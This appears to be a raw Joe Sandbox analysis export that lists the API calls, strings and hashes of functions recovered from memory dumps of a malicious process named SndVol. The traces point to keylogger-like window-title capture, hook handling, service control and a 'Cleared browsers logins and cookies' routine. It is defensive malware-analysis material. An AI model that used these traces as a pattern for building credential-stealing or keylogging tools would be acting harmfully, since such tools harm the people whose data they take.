                                                                • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                                • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                                • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                                • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                                APIs
                                                                • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                                • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                                • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                • String ID: pth_unenc
                                                                • API String ID: 3123878439-4028850238
                                                                • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                                • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                                • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressHandleModuleProc
                                                                • String ID: GetCursorInfo$User32.dll
                                                                • API String ID: 1646373207-2714051624
                                                                • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                                • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                                • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetLastInputInfo$User32.dll
                                                                • API String ID: 2574300362-1519888992
                                                                • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                                • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                                • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __alldvrm$_strrchr
                                                                • String ID:
                                                                • API String ID: 1036877536-0
                                                                • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                                • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                                • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                                APIs
                                                                Strings
                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                                • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                • API String ID: 3472027048-1236744412
                                                                • Opcode ID: a2f891f9d224728c04bbb1debadef956fab89d0381d541b8d2862f798e9015da
                                                                • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                                • Opcode Fuzzy Hash: a2f891f9d224728c04bbb1debadef956fab89d0381d541b8d2862f798e9015da
                                                                • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                                APIs
                                                                • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                                                                • EnumDisplayDevicesW.USER32(?), ref: 00419525
                                                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DisplayEnum$Devices$Monitors
                                                                • String ID:
                                                                • API String ID: 1432082543-0
                                                                • Opcode ID: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                                • Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
                                                                • Opcode Fuzzy Hash: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                                • Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A
                                                                APIs
                                                                  • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                                                  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                                                  • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                                                • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                                • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$ForegroundLength
                                                                • String ID: [ $ ]
                                                                • API String ID: 3309952895-93608704
                                                                • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                                • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                                • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                                • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                • String ID:
                                                                • API String ID: 188215759-0
                                                                • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                                                • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                                • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                                • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                • String ID:
                                                                • API String ID: 188215759-0
                                                                • Opcode ID: b8bb93d5447286bf8985475e98bb867f7c6088c22b25315fdffcecb7cb36d65f
                                                                • Instruction ID: 0185fdb4e0a10860a08f25615f962f8d83f6de52f5679914cf2224bf0efb5741
                                                                • Opcode Fuzzy Hash: b8bb93d5447286bf8985475e98bb867f7c6088c22b25315fdffcecb7cb36d65f
                                                                • Instruction Fuzzy Hash: B4110073A043496BC304EAB5CC8CDAB77ACEAC5654F048A3DB686C2054FE65DA4886A5
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                • Instruction ID: 9ff7a9f2b42b96a7b2824fbbabf54c42add298eb19ec560583a0daba2d877c3d
                                                                • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                                • Instruction Fuzzy Hash: ED01A2F62093197EFF282A786CC4F77274EFB466B9B250325B532D11D1DBB08D414165
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                                • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                • Instruction ID: 01f928b3c513b7b27ca609050f903516d4214a914cdabd10b5e7ed550341839a
                                                                • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                                • Instruction Fuzzy Hash: B70181FA60921ABEAF5926786CC8D276A4EFF422B43251335B531D11E1DA70CC124161
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                                • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                                • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                                APIs
                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                                  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                                • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                                • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                • String ID:
                                                                • API String ID: 2633735394-0
                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                                APIs
                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0538A547
                                                                  • Part of subcall function 0538AB7F: ___AdjustPointer.LIBCMT ref: 0538ABC9
                                                                • _UnwindNestedFrames.LIBCMT ref: 0538A55E
                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 0538A570
                                                                • CallCatchBlock.LIBVCRUNTIME ref: 0538A594
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                • String ID:
                                                                • API String ID: 2633735394-0
                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction ID: 4099fcc9c7cda4ea441b1b345eb351149c8121876d35a05c65888c253590c4d6
                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction Fuzzy Hash: A0015E32100208BBCF16AF55CC04EEA3BBAFF48724F054116FE5866120D372E9A5DFA0
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0536B2F0,00000000), ref: 0536B782
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0536B2F0,00000000), ref: 0536B796
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0536B2F0,00000000), ref: 0536B7A3
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0536B2F0,00000000), ref: 0536B7B2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$Open$CloseControlHandleManager
                                                                • String ID:
                                                                • API String ID: 1243734080-0
                                                                • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                                • Instruction ID: f03ba433f047179d3ed639d26a68ed5b0ff8176c9c8f3717c9ec357953bc5087
                                                                • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                                                • Instruction Fuzzy Hash: D3F0CD31600228ABD720AF24AC89EFF3BACEF45A61F000429FD09C2182DB64CD459AA1
                                                                APIs
                                                                • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                                                • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                                                • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                                                • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MetricsSystem
                                                                • String ID:
                                                                • API String ID: 4116985748-0
                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0536B36D,00000000), ref: 0536B720
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0536B36D,00000000), ref: 0536B735
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0536B36D,00000000), ref: 0536B742
                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0536B36D,00000000), ref: 0536B74D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$Open$CloseHandleManagerStart
                                                                • String ID:
                                                                • API String ID: 2553746010-0
                                                                • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                                • Instruction ID: cd001bda2bfaa3546c8da23c661091722cacd8aac577967dfd7ed8cd9f03325a
                                                                • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                                • Instruction Fuzzy Hash: 76F08275101324AFD611AF20ACD8EFF2B6CEF85AA2B010829F841D2191DB68CD49A9B5
                                                                APIs
                                                                • FindResourceA.KERNEL32(0046CA14,0000000A,00000000), ref: 0536C186
                                                                • LoadResource.KERNEL32(00000000,?,?,053600AB,00000000), ref: 0536C19A
                                                                • LockResource.KERNEL32(00000000,?,?,053600AB,00000000), ref: 0536C1A1
                                                                • SizeofResource.KERNEL32(00000000,?,?,053600AB,00000000), ref: 0536C1B0
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID:
                                                                • API String ID: 3473537107-0
                                                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                • Instruction ID: 30814b06f0e6637bea813db7501c92ba5312f688f5fbe0bb09f410eb809b47ba
                                                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                • Instruction Fuzzy Hash: B4E01A36200B22EBEB211BA5AC4CD463E39F7C9763B100075FA0696231CA758840DAA8
                                                                APIs
                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                                                  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                • String ID:
                                                                • API String ID: 1761009282-0
                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                                                                • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                                                                • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                                                                APIs
